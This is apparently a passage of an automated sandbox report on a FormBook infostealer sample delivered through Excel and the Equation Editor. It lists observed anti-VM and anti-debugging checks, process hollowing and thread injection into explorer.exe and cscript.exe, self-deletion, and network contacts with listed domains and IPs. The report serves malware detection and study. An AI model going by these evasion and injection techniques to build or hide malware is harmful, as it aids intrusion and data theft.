Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cscript.exe	RDTSC instruction interceptor: First address: 0000000000079904 second address: 000000000007990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cscript.exe	RDTSC instruction interceptor: First address: 0000000000079B7E second address: 0000000000079B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2984	Thread sleep time: -120000s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe TID: 2092	Thread sleep time: -36000s >= -30000s			Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\cscript.exe	Last function: Thread delayed

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\Public\vbc.exe

Code function: 5_2_00409AB0 rdtsc

5_2_00409AB0

Queries a list of all running processes

Source: C:\Users\Public\vbc.exe

Process information queried: ProcessInformation

Jump to behavior

Contains functionality to enumerate / list files inside a directory

Source: C:\Users\Public\vbc.exe	Code function: 4_2_00405250 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,		4_2_00405250
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00405C22 FindFirstFileA,FindClose,		4_2_00405C22
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00402630 FindFirstFileA,		4_2_00402630

May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)

Source: explorer.exe, 00000006.00000000.485535425.000000000457A000.00000004.00000001.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: explorer.exe, 00000006.00000000.462632682.0000000000255000.00000004.00000020.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.531903120.000000000460B000.00000004.00000001.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0libr
Source: explorer.exe, 00000006.00000000.480214467.0000000008402000.00000004.00000001.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000%
Source: explorer.exe, 00000006.00000000.485535425.000000000457A000.00000004.00000001.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: vbc.exe, 00000004.00000002.459995878.0000000000264000.00000004.00000020.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: explorer.exe, 00000006.00000000.531615783.000000000456F000.00000004.00000001.sdmp	Binary or memory string: scsi\disk&ven_vmware&prod_virtual_disk\5&22be343f&0&000000
Source: explorer.exe, 00000006.00000000.485535425.000000000457A000.00000004.00000001.sdmp	Binary or memory string: pciide\idechannel\5&12368b4a&0&7ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0acpi\pnp0a05\5cacpi\pnp0a05\25pciide\idech7
Source: explorer.exe, 00000006.00000000.531546454.00000000044E7000.00000004.00000001.sdmp	Binary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0
Source: explorer.exe, 00000006.00000000.527617599.000000000029B000.00000004.00000020.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
Source: explorer.exe, 00000006.00000000.531838904.00000000045D6000.00000004.00000001.sdmp	Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}

Anti Debugging:

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\Public\vbc.exe

Code function: 4_2_10013450 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

4_2_10013450

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Source: C:\Users\Public\vbc.exe

Code function: 4_2_10013450 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

4_2_10013450

Contains functionality to dynamically determine API calls

Source: C:\Users\Public\vbc.exe

Code function: 4_2_00405C49 GetModuleHandleA,LoadLibraryA,GetProcAddress,

4_2_00405C49

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\Public\vbc.exe

Code function: 4_2_10001000 GetProcessHeap,HeapAlloc,RegCreateKeyExW,GetProcessHeap,HeapFree,

4_2_10001000

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\Public\vbc.exe

Code function: 5_2_00409AB0 rdtsc

5_2_00409AB0

Enables debug privileges

Source: C:\Users\Public\vbc.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Process token adjusted: Debug			Jump to behavior

Contains functionality to read the PEB

Source: C:\Users\Public\vbc.exe	Code function: 5_2_007626F8 mov eax, dword ptr fs:[00000030h]		5_2_007626F8
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_023326F8 mov eax, dword ptr fs:[00000030h]		7_2_023326F8

Checks if the current process is being debugged

Source: C:\Users\Public\vbc.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Process queried: DebugPort			Jump to behavior

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Users\Public\vbc.exe

Code function: 5_2_0040ACF0 LdrLoadDll,

5_2_0040ACF0

Contains functionality to register its own exception handler

Source: C:\Users\Public\vbc.exe

Code function: 4_2_1000F001 SetUnhandledExceptionFilter,UnhandledExceptionFilter,

4_2_1000F001

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 104.21.82.75 80			Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.oojry.xyz
Source: C:\Windows\explorer.exe	Domain query: www.crystalsbyzoe.com
Source: C:\Windows\explorer.exe	Network Connect: 34.246.239.131 80			Jump to behavior

Sample uses process hollowing technique

Source: C:\Users\Public\vbc.exe

Section unmapped: C:\Windows\SysWOW64\cscript.exe base address: A40000

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write			Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\Public\vbc.exe

Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Users\Public\vbc.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\Public\vbc.exe	Thread register set: target process: 1764			Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Thread register set: target process: 1764			Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"			Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe"			Jump to behavior

May try to detect the Windows Explorer process (often used for injection)

Source: explorer.exe, 00000006.00000000.473759544.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.463194949.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.527835651.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.481911491.0000000000750000.00000002.00020000.sdmp, cscript.exe, 00000007.00000002.662281409.0000000000A70000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000000.527587119.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.473549463.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.481695686.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.462632682.0000000000255000.00000004.00000020.sdmp	Binary or memory string: ProgmanG
Source: explorer.exe, 00000006.00000000.473759544.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.463194949.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.527835651.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.481911491.0000000000750000.00000002.00020000.sdmp, cscript.exe, 00000007.00000002.662281409.0000000000A70000.00000002.00020000.sdmp	Binary or memory string: !Progman
Source: explorer.exe, 00000006.00000000.473759544.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.463194949.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.527835651.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.481911491.0000000000750000.00000002.00020000.sdmp, cscript.exe, 00000007.00000002.662281409.0000000000A70000.00000002.00020000.sdmp	Binary or memory string: Program Manager<

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)

Source: C:\Users\Public\vbc.exe

Code function: 4_2_10011025 cpuid

4_2_10011025

Contains functionality to query windows version

Source: C:\Users\Public\vbc.exe

Code function: 4_2_0040594D GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,

4_2_0040594D

Stealing of Sensitive Information:

Yara detected FormBook

Source: Yara match	File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.2980000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.2980000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000000.458934235.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.661950337.0000000000070000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.495102913.0000000000700000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.661999463.00000000001A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.494981815.0000000000430000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.461465178.0000000002980000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.486605317.0000000007EF9000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.494965073.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.479874568.0000000007EF9000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.662048126.00000000002D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000001.459709526.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.457834492.0000000000400000.00000040.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook

Source: Yara match	File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.2980000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.2980000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000000.458934235.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.661950337.0000000000070000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.495102913.0000000000700000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.661999463.00000000001A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.494981815.0000000000430000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.461465178.0000000002980000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.486605317.0000000007EF9000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.494965073.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.479874568.0000000007EF9000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.662048126.00000000002D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000001.459709526.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.457834492.0000000000400000.00000040.00000001.sdmp, type: MEMORY